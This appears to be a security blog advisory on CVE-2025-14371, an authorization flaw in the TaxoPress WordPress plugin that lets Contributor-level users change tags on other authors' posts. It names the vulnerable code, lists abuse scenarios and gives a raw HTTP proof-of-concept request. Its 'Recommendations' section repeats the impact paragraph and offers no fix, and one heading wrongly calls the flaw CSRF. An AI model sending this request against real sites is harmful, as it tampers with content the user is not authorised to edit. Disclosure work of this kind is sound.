CVE-2025-14371 affects TaxoPress and it breaks a core WordPress safety boundary where a user may have access to an editor feature but should not be able to change content they cannot edit. The vulnerability allows any authenticated user who is permitted to use the TaxoPress AI metabox, typically Contributor or Author and above, to add or remove tags on posts they do not own by supplying a victim post ID. This becomes a direct content integrity issue because tags and other taxonomy terms drive search relevance, internal navigation, feeds, and SEO surfaces, meaning a low privilege account can silently reshape how content is discovered even when the same user cannot open the post editor for the target post. Install base is significant at 50k plus, so multi author environments where Contributors exist are realistic targets rather than edge cases.

CVECVE-2025-14371
Plugin VersionTaxoPress <= 3.41.0
All Time5 785 174
Active installations50 000+
Publicly PublishedJanuary 5, 2025
Last UpdatedJanuary 5, 2025
ResearcherDmitrii Ignatyev
PoCYes
ExploitNo
Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-14371
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-tags/taxopress-3410-missing-authorization-to-authenticated-contributor-arbitrary-post-tag-modification
Plugin Security Certification by CleanTalk
Logo of the plugin

Join the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.

PSC by Cleantalk

Timeline

November 26, 2025Plugin testing and vulnerability detection in the TaxoPress have been completed
November 26, 2025I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
January 5, 2025Registered CVE-2025-14371

Discovery of the Vulnerability

The weakness is an object level authorization bypass. The handler validates a TaxoPress AI nonce and checks general metabox permissions, yet it never performs the WordPress standard per object permission check current_user_can( 'edit_post', $post_id ) for the post being modified. In other words, the code proves the caller is allowed to use the AI feature, but it never proves the caller is allowed to modify the specific post referenced by post_id. The vulnerable logic lives in modules/taxopress-ai/classes/TaxoPressAiAjax.php around lines 681 through 797, and the actual mutations occur where terms are inserted and assigned using functions like wp_set_object_termswp_remove_object_terms, and wp_insert_term without a guard that binds the action to an authorized post. This is the exact pattern that produces IDOR style horizontal privilege escalation in WordPress plugins.

Understanding of IDOR attack’s

In WordPress, the permission model is intentionally object scoped. A Contributor may create and edit their own drafts, but they cannot alter other authors’ posts unless explicitly granted. Taxonomies are not harmless metadata, they are part of the editorial product. Tags and categories influence archive pages, related content blocks, topic hubs, RSS feeds, and sometimes paid syndication flows, and they can also trigger automation such as newsletters, push notifications, and social publishing rules. When a plugin allows a user to change terms on another user’s post, the attacker can manipulate the site’s information architecture without touching the post body, which often makes the abuse harder to notice. Real world abuse can include pushing competitor content into irrelevant tags, removing a post from a curated topic feed, injecting misleading tags that create reputational harm, or polluting a site’s SEO strategy by attaching spammy terms that degrade topical authority.

Exploiting the CSRF Vulnerability

To exploit CVE-2025-14371, an attacker with Contributor+ cookies:

POC:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/edit.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 140
Origin: http://127.0.0.1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Contributor+
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=taxopress_ai_add_post_term&nonce=st_admin_localize.ai_nonce_from_profile.php&taxonomy=post_tag&post_id=86&added_tags[0][term_id]=0&added_tags[0][name]=POC

____

The security impact is integrity loss with practical business consequences. A malicious Contributor can target a specific high traffic post and attach tags that redirect readers into attacker chosen topic pages, disrupt internal linking signals, and distort analytics that depend on taxonomy grouping. On news and media sites, tags can determine where articles appear on category hubs and homepage modules, so an attacker can quietly alter editorial placement without publishing rights. On e commerce blogs and affiliate sites, tags can drive conversion flows and landing page relevance, so term manipulation can become a subtle sabotage tactic. The risk also compounds when sites use tags to trigger automation, for example pushing posts into newsletters or social queues, because an attacker can induce unexpected distribution or remove content from planned campaigns, all while leaving minimal traces compared to editing the post body.

Recommendations for Improved Security

The security impact is integrity loss with practical business consequences. A malicious Contributor can target a specific high traffic post and attach tags that redirect readers into attacker chosen topic pages, disrupt internal linking signals, and distort analytics that depend on taxonomy grouping. On news and media sites, tags can determine where articles appear on category hubs and homepage modules, so an attacker can quietly alter editorial placement without publishing rights. On e commerce blogs and affiliate sites, tags can drive conversion flows and landing page relevance, so term manipulation can become a subtle sabotage tactic. The risk also compounds when sites use tags to trigger automation, for example pushing posts into newsletters or social queues, because an attacker can induce unexpected distribution or remove content from planned campaigns, all while leaving minimal traces compared to editing the post body.

By taking proactive measures to address IDOR like CVE-2025-14371 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.

#WordPressSecurity #IDOR #WebsiteSafety #StayProtected #HighVulnerability

Use CleanTalk solutions to improve the security of your website

Dmitrii I.
CVE-2025-14371 – TaxoPress – IDOR / Object‑Level Authorization Bypass to Modify Terms of Arbitrary Post – POC

Leave a Reply

Your email address will not be published. Required fields are marked *